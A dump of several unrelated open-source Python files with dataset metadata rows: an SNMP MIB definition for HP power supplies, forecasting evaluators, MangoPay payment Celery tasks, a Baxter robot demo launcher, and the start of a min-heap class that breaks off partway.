hpicfXpsResetReqStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("idle", 1), ("inProgress", 2), ("success", 3), ("failed", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsResetReqStatus.setStatus('current')
hpicfXpsZoneTable = MibTable((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4), )
if mibBuilder.loadTexts: hpicfXpsZoneTable.setStatus('current')
hpicfXpsZoneEntry = MibTableRow((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"))
if mibBuilder.loadTexts: hpicfXpsZoneEntry.setStatus('current')
hpicfXpsZoneNo = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneNo.setStatus('current')
hpicfXpsZoneState = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 2), HpicfXpsZoneStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneState.setStatus('current')
hpicfXpsZonePowerShareMap = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsZonePowerShareMap.setStatus('current')
hpicfXpsZoneVoltage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 4), Unsigned32()).setUnits('Volts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneVoltage.setStatus('current')
hpicfXpsZoneWattage = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 5), Unsigned32()).setUnits('Watts').setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneWattage.setStatus('current')
hpicfXpsPSURev = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 6), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPSURev.setStatus('current')
hpicfXpsPSUModule = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsPSUModule.setStatus('current')
hpicfXpsZonePowerShareForce = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 8), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: hpicfXpsZonePowerShareForce.setStatus('current')
hpicfXpsZoneRecordVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 1, 4, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hpicfXpsZoneRecordVersion.setStatus('current')
hpicfPsConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2))
hpicfPsCompliance = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1))
hpicfPsGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2))
hpicfDcPsCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 1)).setObjects(("POWERSUPPLY-MIB", "hpicfPsGroup"), ("POWERSUPPLY-MIB", "hpicfPsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfDcPsCompliance = hpicfDcPsCompliance.setStatus('deprecated')
hpicfXpsCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 2)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsGroup"), ("POWERSUPPLY-MIB", "hpicfXpsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsCompliance = hpicfXpsCompliance.setStatus('current')
hpicfXpsZoneCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 3)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsZoneGroup"), ("POWERSUPPLY-MIB", "hpicfXpsZoneGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsZoneCompliance = hpicfXpsZoneCompliance.setStatus('current')
hpicfDcPsCompliance1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 1, 4)).setObjects(("POWERSUPPLY-MIB", "hpicfPsGroup1"), ("POWERSUPPLY-MIB", "hpicfPsGroup1"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfDcPsCompliance1 = hpicfDcPsCompliance1.setStatus('current')
hpicfPsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 1)).setObjects(("POWERSUPPLY-MIB", "hpicfPsState"), ("POWERSUPPLY-MIB", "hpicfPsFailures"), ("POWERSUPPLY-MIB", "hpicfPsTemp"), ("POWERSUPPLY-MIB", "hpicfPsVoltageInfo"), ("POWERSUPPLY-MIB", "hpicfPsWattageCur"), ("POWERSUPPLY-MIB", "hpicfPsWattageMax"), ("POWERSUPPLY-MIB", "hpicfPsLastCall"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfPsGroup = hpicfPsGroup.setStatus('deprecated')
hpicfXpsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 2)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsPortOperStatus"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchSerialNo"), ("POWERSUPPLY-MIB", "hpicfXpsConnectionState"), ("POWERSUPPLY-MIB", "hpicfXpsSysName"), ("POWERSUPPLY-MIB", "hpicfXpsMACAddress"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchOSVersion"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchIpsVoltage"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchIpsWattage"), ("POWERSUPPLY-MIB", "hpicfXpsPower"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchAdminStatus"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchAutoRecovery"), ("POWERSUPPLY-MIB", "hpicfXpsAllowPortsSupported"), ("POWERSUPPLY-MIB", "hpicfXpsReset"), ("POWERSUPPLY-MIB", "hpicfXpsType"), ("POWERSUPPLY-MIB", "hpicfXpsSerialNum"), ("POWERSUPPLY-MIB", "hpicfXpsModuleName"), ("POWERSUPPLY-MIB", "hpicfXpsPowerShareReqStatus"), ("POWERSUPPLY-MIB", "hpicfXpsResetReqStatus"), ("POWERSUPPLY-MIB", "hpicfXpsSupportedCableVersion"), ("POWERSUPPLY-MIB", "hpicfXpsSupportedZoneVersion"), ("POWERSUPPLY-MIB", "hpicfXpsSwitchModType"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsGroup = hpicfXpsGroup.setStatus('current')
hpicfXpsZoneGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 3)).setObjects(("POWERSUPPLY-MIB", "hpicfXpsZoneNo"), ("POWERSUPPLY-MIB", "hpicfXpsZoneState"), ("POWERSUPPLY-MIB", "hpicfXpsZonePowerShareMap"), ("POWERSUPPLY-MIB", "hpicfXpsZoneVoltage"), ("POWERSUPPLY-MIB", "hpicfXpsZoneWattage"), ("POWERSUPPLY-MIB", "hpicfXpsPSURev"), ("POWERSUPPLY-MIB", "hpicfXpsPSUModule"), ("POWERSUPPLY-MIB", "hpicfXpsZonePowerShareForce"), ("POWERSUPPLY-MIB", "hpicfXpsZoneRecordVersion"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfXpsZoneGroup = hpicfXpsZoneGroup.setStatus('current')
hpicfPsGroup1 = ObjectGroup((1, 3, 6, 1, 4, 1, 11, 2, 14, 11, 5, 1, 55, 2, 2, 4)).setObjects(("POWERSUPPLY-MIB", "hpicfPsState"), ("POWERSUPPLY-MIB", "hpicfPsFailures"), ("POWERSUPPLY-MIB", "hpicfPsTemp"), ("POWERSUPPLY-MIB", "hpicfPsVoltageInfo"), ("POWERSUPPLY-MIB", "hpicfPsWattageCur"), ("POWERSUPPLY-MIB", "hpicfPsWattageMax"), ("POWERSUPPLY-MIB", "hpicfPsLastCall"), ("POWERSUPPLY-MIB", "hpicfPsModel"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hpicfPsGroup1 = hpicfPsGroup1.setStatus('current')
mibBuilder.exportSymbols("POWERSUPPLY-MIB", hpicfXpsSerialNum=hpicfXpsSerialNum, hpicfEntityPs=hpicfEntityPs, hpicfDcPsCompliance1=hpicfDcPsCompliance1, hpicfXpsSwitchOSVersion=hpicfXpsSwitchOSVersion, hpicfPsTemp=hpicfPsTemp, hpicfXpsReset=hpicfXpsReset, PYSNMP_MODULE_ID=hpicfPsMIB, hpicfPsGroup1=hpicfPsGroup1, hpicfXpsMACAddress=hpicfXpsMACAddress, hpicfXpsZoneNo=hpicfXpsZoneNo, hpicfXpsSwitchAutoRecovery=hpicfXpsSwitchAutoRecovery, hpicfXpsZoneVoltage=hpicfXpsZoneVoltage, hpicfXpsZoneWattage=hpicfXpsZoneWattage, hpicfPsLastCall=hpicfPsLastCall, hpicfXpsCompliance=hpicfXpsCompliance, hpicfPsGroups=hpicfPsGroups, hpicfXpsPowerShareReqStatus=hpicfXpsPowerShareReqStatus, hpicfXpsSwitchIpsWattage=hpicfXpsSwitchIpsWattage, hpicfPsVoltageInfo=hpicfPsVoltageInfo, hpicfXpsResetReqStatus=hpicfXpsResetReqStatus, hpicfXpsZonePowerShareForce=hpicfXpsZonePowerShareForce, hpicfPsTable=hpicfPsTable, hpicfXpsSwitchConfigEntry=hpicfXpsSwitchConfigEntry, hpicfXpsZoneEntry=hpicfXpsZoneEntry, hpicfXpsModuleName=hpicfXpsModuleName, hpicfXpsZoneRecordVersion=hpicfXpsZoneRecordVersion, hpicfXpsPSURev=hpicfXpsPSURev, HpicfDcPsState=HpicfDcPsState, hpicfXpsPortOperStatus=hpicfXpsPortOperStatus, hpicfXpsPSUModule=hpicfXpsPSUModule, hpicfXpsSwitchSerialNo=hpicfXpsSwitchSerialNo, hpicfXpsPower=hpicfXpsPower, HpicfXpsConnectionStatus=HpicfXpsConnectionStatus, hpicfPsState=hpicfPsState, HpicfXpsZoneStatus=HpicfXpsZoneStatus, hpicfXpsSwitchIpsVoltage=hpicfXpsSwitchIpsVoltage, hpicfXpsZoneGroup=hpicfXpsZoneGroup, hpicfXpsZonePowerShareMap=hpicfXpsZonePowerShareMap, hpicfPsMIB=hpicfPsMIB, hpicfPsModel=hpicfPsModel, hpicfDcPsCompliance=hpicfDcPsCompliance, hpicfXpsZoneTable=hpicfXpsZoneTable, hpicfXpsTable=hpicfXpsTable, hpicfXpsSupportedCableVersion=hpicfXpsSupportedCableVersion, hpicfXpsSwitchConfigTable=hpicfXpsSwitchConfigTable, hpicfXpsZoneCompliance=hpicfXpsZoneCompliance, hpicfXpsSwitchAdminStatus=hpicfXpsSwitchAdminStatus, hpicfPsConformance=hpicfPsConformance, 
HpicfDcPsIndex=HpicfDcPsIndex, hpicfXpsZoneState=hpicfXpsZoneState, hpicfXpsConnectingPort=hpicfXpsConnectingPort, hpicfPsGroup=hpicfPsGroup, hpicfPsFailures=hpicfPsFailures, hpicfXpsGroup=hpicfXpsGroup, hpicfPsEntry=hpicfPsEntry, hpicfXpsSwitchModType=hpicfXpsSwitchModType, hpicfXpsSupportedZoneVersion=hpicfXpsSupportedZoneVersion, hpicfXpsAllowPortsSupported=hpicfXpsAllowPortsSupported, hpicfXpsSysName=hpicfXpsSysName, hpicfPsWattageCur=hpicfPsWattageCur, hpicfXpsConnectionState=hpicfXpsConnectionState, hpicfPsBayNum=hpicfPsBayNum, hpicfPsCompliance=hpicfPsCompliance, hpicfXpsEntry=hpicfXpsEntry, hpicfPsWattageMax=hpicfPsWattageMax, hpicfXpsType=hpicfXpsType)
| 124.715976 | 2,641 | 0.737866 |
795c5cc245391cb0719d1ff3b2475599fd251801 | 4,824 | py | Python | timemachines/skatertools/evaluation/evaluators.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 253 | 2021-01-08T17:33:30.000Z | 2022-03-21T17:32:36.000Z | timemachines/skatertools/evaluation/evaluators.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 65 | 2021-01-20T16:43:35.000Z | 2022-03-30T19:07:22.000Z | timemachines/skatertools/evaluation/evaluators.py | iklasky/timemachines | 1820fa9453d31d4daaeff75274a935c7455febe3 | [
"MIT"
] | 28 | 2021-02-04T14:58:30.000Z | 2022-01-17T04:35:17.000Z | from timemachines.skatertools.data.synthetic import brownian_with_noise, brownian_with_exogenous
from timemachines.skating import residuals, prior_with_sporadic_fit
from timemachines.inclusion.sklearninclusion import using_sklearn
from timemachines.inclusion.scipyinclusion import using_scipy
import numpy as np
from timemachines.skatertools.utilities.conventions import targets
from typing import List
from timemachines.skatertools.data.real import hospital, hospital_with_exog
# Evaluation of skaters
def evaluator_from_name(name):
valid = [f for f in EVALUATORS if f.__name__==name ]
return valid[0] if len(valid)==1 else None
if using_sklearn:
from sklearn.metrics import mean_squared_error, mean_absolute_error
def evaluate_sklearn_metric(f, y, k:int, a=None, t=None, e_fit=60, e_nofit=-1, metric=None, r=None)->float:
""" Compute prior for skater and evaluate an sklearn metric
n_test: Number of data points to test with
Trains on history then computes several test samples
"""
return evaluate_sklearn_metric_with_sporadic_fit(f=f,y=y,k=k,a=a,t=t,e_fit=e_fit, e_nofit=e_nofit, r=r, fit_frequency=1, metric=metric )
def evaluate_sklearn_metric_with_sporadic_fit(f, y, k:int, a=None, t=None, e=None, r=None, metric=None,
n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
x, x_std = prior_with_sporadic_fit(f=f, y=y, k=k, a=a, t=t, r=r, n_test=n_test,
e_fit=e_fit, e_nofit=e_nofit, fit_frequency=fit_frequency)
yt = targets(y)
xk = [xt[-1] for xt in x]
return metric(yt[-n_test:], xk[-n_test:])
def evaluate_mean_squared_error_with_sporadic_fit(f, y, k:int, a=None, t=None, r=None, n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
return evaluate_sklearn_metric_with_sporadic_fit(f=f, y=y, k=k, a=a, t=t, r=r, metric=mean_squared_error, e_fit=e_fit, e_nofit=e_nofit, n_test=n_test, fit_frequency=fit_frequency)
def hospital_mean_square_error_with_sporadic_fit(f, k:int=1, n=120, r=None, n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
""" Useful for a quick test of a skater, univariate and random hyper-param """
y = hospital()[:n]
return evaluate_mean_squared_error_with_sporadic_fit(f=f, y=y, k=k, r=r, e_fit=e_fit, n_test=n_test, e_nofit=e_nofit, fit_frequency=fit_frequency)
def hospital_mean_square_error(f, k:int=1, n=120, r=None, n_test:int=10, e_fit=60, e_nofit=-1)->float:
""" Useful for a quick test of a skater, univariate and random hyper-param """
return hospital_mean_square_error_with_sporadic_fit(f=f, k=k, n=n, r=r, e_fit=e_fit, n_test=n_test, e_nofit=e_nofit, fit_frequency=1)
def hospital_exog_mean_square_error_with_sporadic_fit(f, k, n=120, r=None, n_test:int=10, e_fit=60, e_nofit=-1, fit_frequency:int=100)->float:
""" Useful for a quick test of a skater w/ exogenous inputs and known-in-advance variables """
y, a = hospital_with_exog(n=n,k=k)
return evaluate_mean_squared_error_with_sporadic_fit(f=f, y=y, a=a, k=k, r=r, n_test=n_test, e_fit=e_fit, e_nofit=e_nofit, fit_frequency=fit_frequency)
EVALUATORS = [evaluate_mean_squared_error_with_sporadic_fit]
else:
#pip install scikit-learn
EVALUATORS = []
# Energy distance between consecutive epochs
# (a more speculative way to evaluate point estimates)
def chunk_to_end(l:List, n:int)-> List[List]:
""" Break list in to evenly sized chunks
:param n: Size of batches
"""
rl = list(reversed(l))
chunks = [ list(reversed(rl[x:x + n])) for x in range(0, len(rl), n) ]
return list(reversed(chunks[:-1]))
if using_scipy:
from scipy.stats import energy_distance
def evaluate_energy(f, y=None, k=1, a=None, t=None, e=None, r=None, n_burn=30, n_epoch=30):
r = residuals(f=f, y=y, k=k, a=a, t=t, e=e, r=r, n_burn=n_burn)
r_chunks = chunk_to_end(r,n_epoch)
assert len(r_chunks)>=2,'Cannot evaluate ... try a shorter n_epoch '
uv = [ (u,v) for u,v in zip( r_chunks[1:],r_chunks[:-1] )] # residuals in one epoch versus the next
return np.mean([ energy_distance(u_values=u_values,v_values=v_values) for u_values, v_values in uv ])
def hospital_energy(f, k=3, n=100, n_epoch=20, n_burn=18):
y, a = hospital_with_exog(n=n+5)
return evaluate_energy(f=f, y=y, k=k, a=a, n_burn=n_burn, n_epoch=n_epoch)
def brownian_energy(f, n=500, **kwargs):
ys = brownian_with_noise(n)
return evaluate_energy(f=f, y=ys, **kwargs)
def exogenous_energy(f, n=500, **kwargs):
ys = brownian_with_exogenous(n)
return evaluate_energy(f=f, y=ys, **kwargs)
| 45.942857 | 187 | 0.692579 |
795c5cc631f00375a27f784611616ef675d75412 | 4,289 | py | Python | mangopay/tasks.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 1 | 2022-01-27T11:58:10.000Z | 2022-01-27T11:58:10.000Z | mangopay/tasks.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | 5 | 2021-03-19T00:01:54.000Z | 2022-03-11T23:46:21.000Z | mangopay/tasks.py | sladinji/blousebrothers | 461de3ba011c0aaed3f0014136c4497b6890d086 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from django.conf import settings
from celery.task import task
from celery.task import PeriodicTask
from celery.schedules import crontab
from celery.utils.log import get_task_logger
from mangopaysdk.types.exceptions.responseexception import ResponseException
from .constants import VALIDATION_ASKED
from .models import (MangoPayUser, MangoPayBankAccount,
MangoPayDocument, MangoPayWallet, MangoPayPayOut,
MangoPayTransfer)
logger = get_task_logger(__name__)
def next_weekday(start=None):
    """Return the first weekday (Mon-Fri) strictly after *start*.

    Starts from ``start + 1 day`` and skips forward over Saturday and
    Sunday, preserving the time of day.

    :param start: reference datetime; defaults to ``datetime.now()``
                  (the new parameter keeps the original zero-argument
                  call backward compatible and makes the function
                  deterministic for testing).
    """
    if start is None:
        start = datetime.now()
    date = start + timedelta(days=1)
    # weekday() is 5 for Saturday and 6 for Sunday; iterative form of the
    # original recursive skip.
    while date.weekday() >= 5:
        date += timedelta(days=1)
    return date
@task
def create_mangopay_user(id):
    """Create the remote MangoPay counterpart of local user *id*.

    The task retries itself when the MangoPay API returns an error.
    """
    candidates = MangoPayUser.objects.select_subclasses()
    try:
        candidates.get(id=id, mangopay_id__isnull=True).create()
    except ResponseException as error:
        raise create_mangopay_user.retry((), {"id": id}, exc=error)
@task
def update_mangopay_user(id):
    """Push local changes for user *id* to MangoPay.

    Only users that already exist remotely (non-null mangopay_id) are
    updated; the task retries itself on a MangoPay API error.
    """
    candidates = MangoPayUser.objects.select_subclasses()
    try:
        candidates.get(id=id, mangopay_id__isnull=False).update()
    except ResponseException as error:
        raise update_mangopay_user.retry((), {"id": id}, exc=error)
@task
def create_mangopay_bank_account(id):
    """Register local bank account *id* with MangoPay.

    Retries the task when the MangoPay API returns an error.
    """
    try:
        account = MangoPayBankAccount.objects.get(id=id, mangopay_id__isnull=True)
        account.create()
    except ResponseException as error:
        raise create_mangopay_bank_account.retry((), {"id": id}, exc=error)
@task
def create_mangopay_document_and_pages_and_ask_for_validation(id):
    """Create KYC document *id* at MangoPay, upload each of its pages,
    then request validation.

    Only the initial remote document creation is retried on an API
    error; page upload and the validation request run once afterwards.
    """
    document = MangoPayDocument.objects.get(id=id, mangopay_id__isnull=True, type__isnull=False)
    try:
        document.create()
    except ResponseException as error:
        raise create_mangopay_document_and_pages_and_ask_for_validation.retry((), {"id": id}, exc=error)
    pages = document.mangopay_pages.all()
    for page in pages:
        page.create()
    document.ask_for_validation()
@task
def update_document_status(id):
    """Re-fetch document *id* from MangoPay, but only while it awaits validation."""
    document = MangoPayDocument.objects.get(id=id)
    if document.status == VALIDATION_ASKED:
        document.get()
class UpdateDocumentsStatus(PeriodicTask):
    """Periodic task that refreshes every document still awaiting validation.

    Scheduled hourly, 08:00-17:00, Monday-Friday; fans out one
    ``update_document_status`` task per pending document.

    NOTE(review): ``abstract = True`` normally prevents Celery from
    registering a task class — confirm this task actually runs, or
    whether a concrete subclass is defined elsewhere.
    """
    abstract = True
    run_every = crontab(minute=0, hour='8-17', day_of_week='mon-fri')
    def run(self, *args, **kwargs):
        """Dispatch one status-update subtask per pending document."""
        documents = MangoPayDocument.objects.filter(status=VALIDATION_ASKED)
        for document in documents:
            update_document_status.delay(document.id)
@task
def create_mangopay_wallet(id, description):
    """Create the remote MangoPay wallet for local wallet *id*.

    Retries with the same arguments on a MangoPay API error.
    """
    wallet = MangoPayWallet.objects.get(id=id, mangopay_id__isnull=True)
    try:
        wallet.create(description=description)
    except ResponseException as exc:
        kwargs = {"id": id, "description": description}
        raise create_mangopay_wallet.retry((), kwargs, exc=exc)
@task
def create_mangopay_pay_out(id, tag=''):
    """Create payout *id* at MangoPay and schedule a follow-up status check.

    On success, an ``update_mangopay_pay_out`` task is scheduled for the
    next business day (payouts are not processed on weekends).  On a
    MangoPay API error the creation is retried.
    """
    payout = MangoPayPayOut.objects.get(id=id, mangopay_id__isnull=True)
    try:
        payout.create(tag)
    except ResponseException as exc:
        kwargs = {"id": id, "tag": tag}
        raise create_mangopay_pay_out.retry((), kwargs, exc=exc)
    eta = next_weekday()
    update_mangopay_pay_out.apply_async((), {"id": id}, eta=eta)
@task
def update_mangopay_pay_out(id):
    """Poll MangoPay for the state of payout *id* and react accordingly.

    While the payout is still pending ("CREATED" or no status yet) the
    task reschedules itself for the next business day.  On "SUCCEEDED"
    an optional project hook (``settings.MANGOPAY_PAYOUT_SUCCEEDED_TASK``)
    is run; any other status is logged as an error.
    """
    payout = MangoPayPayOut.objects.get(id=id, mangopay_id__isnull=False)
    try:
        payout = payout.get()
    except ResponseException as exc:
        raise update_mangopay_pay_out.retry((), {"id": id}, exc=exc)
    if not payout.status or payout.status == "CREATED":
        # Still pending: check again on the next business day.
        eta = next_weekday()
        update_mangopay_pay_out.apply_async((), {"id": id}, eta=eta)
    elif payout.status == "SUCCEEDED":
        # Note: this local name shadows the imported ``task`` decorator,
        # but only within this function body.
        task = getattr(settings, 'MANGOPAY_PAYOUT_SUCCEEDED_TASK', None)
        if task:
            task().run(payout_id=payout.id)
    else:
        logger.error("Payout %i could not be processed successfully" % payout.id)
@task
def create_mangopay_transfer(transfer_id, fees=None):
    """Execute the wallet-to-wallet transfer *transfer_id* at MangoPay.

    Retries with the same arguments on a MangoPay API error.
    """
    transfer = MangoPayTransfer.objects.get(id=transfer_id)
    try:
        transfer.create(fees=fees)
    except ResponseException as e:
        kwargs = {"transfer_id": transfer_id, "fees": fees}
        raise create_mangopay_transfer.retry((), kwargs, exc=e)
| 32.007463 | 81 | 0.691303 |
795c5d69a40a270002f5d14a01a6227991060ee2 | 2,782 | py | Python | scripts/demo_mode.py | birlrobotics/baxter_demo_ui | ca1a9dd3921af4f9bb6cee35b7c8212771a71a96 | [
"BSD-3-Clause"
] | null | null | null | scripts/demo_mode.py | birlrobotics/baxter_demo_ui | ca1a9dd3921af4f9bb6cee35b7c8212771a71a96 | [
"BSD-3-Clause"
] | null | null | null | scripts/demo_mode.py | birlrobotics/baxter_demo_ui | ca1a9dd3921af4f9bb6cee35b7c8212771a71a96 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python
# Copyright (c) 2014, Rethink Robotics
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Rethink Robotics nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import copy
import json
import os
import rospy
import rospkg
from baxter_demo_ui import BrrUi
from baxter_demo_ui.demo_functions import check_calib
'''~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Main loop for the demo mode module.
# Generates UI elements in the following order:
# Buttons, then Windows, then the full UI.
# For each window:
# Will generate a back button if the window is configured to need one.
# Next, each button registered to the Window will be instantiated.
# Finally, the window will be instantiated with a list of buttons
# After all windows are instantiated, the BrrUi class will be instantiated.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~'''
def main():
    """Entry point: build the Baxter demo UI and spin until ROS shutdown."""
    rospy.init_node('rsdk_demo_ui')
    rp = rospkg.RosPack()
    # UI configuration lives in this package's share/ directory.
    pack_path = rp.get_path('baxter_demo_ui') + '/share'
    conf_path = '%s/config.json' % pack_path
    # Names of the demo actions the UI can launch.
    commands = ['baxter_interface', 'record', 'playback', 'puppet',
                'tare', 'calibrate', 'joint_trajectory']
    ui = BrrUi(pack_path, conf_path, commands)
    # Presumably verifies the arms' calibration state before starting —
    # see demo_functions.check_calib.
    check_calib(ui)
    while not rospy.is_shutdown():
        rospy.spin()
if __name__ == '__main__':
    main()
| 41.522388 | 77 | 0.71028 |
795c5e0eebd5790e712bf989f631b99e8c4833c9 | 2,238 | py | Python | heap.py | Kingcitaldo125/PyHeap | 41a6cb719b92311378eeaca23823c935459aba36 | [
"Apache-2.0"
] | null | null | null | heap.py | Kingcitaldo125/PyHeap | 41a6cb719b92311378eeaca23823c935459aba36 | [
"Apache-2.0"
] | null | null | null | heap.py | Kingcitaldo125/PyHeap | 41a6cb719b92311378eeaca23823c935459aba36 | [
"Apache-2.0"
] | null | null | null | from math import inf
class Heap(object):
    """Array-backed binary min-heap.

    ``self.arr[0]`` is always the smallest element.  Index helpers return
    ``-1`` for out-of-range queries; value helpers return ``inf`` so that
    a missing child can never win a min-comparison.
    """
    def __init__(self):
        self.arr = []

    def getLeftChildIdx(self, idx):
        """Index of idx's left child, or -1 if idx is out of range."""
        if idx < 0 or idx >= len(self.arr):
            return -1
        return 2*idx+1

    def getRightChildIdx(self, idx):
        """Index of idx's right child, or -1 if idx is out of range."""
        if idx < 0 or idx >= len(self.arr):
            return -1
        return 2*idx+2

    def getParentIdx(self, idx):
        """Index of idx's parent, or -1 if idx is out of range (or the root)."""
        if idx < 0 or idx >= len(self.arr):
            return -1
        return (idx-1)//2

    def getParent(self, idx):
        """Value of idx's parent, or inf if idx has no valid parent.

        Bug fix: the root (idx == 0) previously returned ``self.arr[-1]``
        (the *last* element) because getParentIdx(0) == -1 was used
        directly as a Python index.
        """
        pidx = self.getParentIdx(idx)
        if pidx < 0:
            return inf
        return self.arr[pidx]

    def getLeftChild(self, idx):
        """Value of idx's left child, or inf if there is none."""
        cidx = self.getLeftChildIdx(idx)
        if cidx == -1 or cidx >= len(self.arr):
            return inf
        return self.arr[cidx]

    def getRightChild(self, idx):
        """Value of idx's right child, or inf if there is none."""
        cidx = self.getRightChildIdx(idx)
        if cidx == -1 or cidx >= len(self.arr):
            return inf
        return self.arr[cidx]

    def heapifyUp(self):
        """Bubble the last element up until the heap property holds."""
        idx = len(self.arr)-1
        while idx > 0:
            parent_idx = self.getParentIdx(idx)
            if self.arr[idx] >= self.arr[parent_idx]:
                break
            self.arr[parent_idx], self.arr[idx] = self.arr[idx], self.arr[parent_idx]
            idx = parent_idx

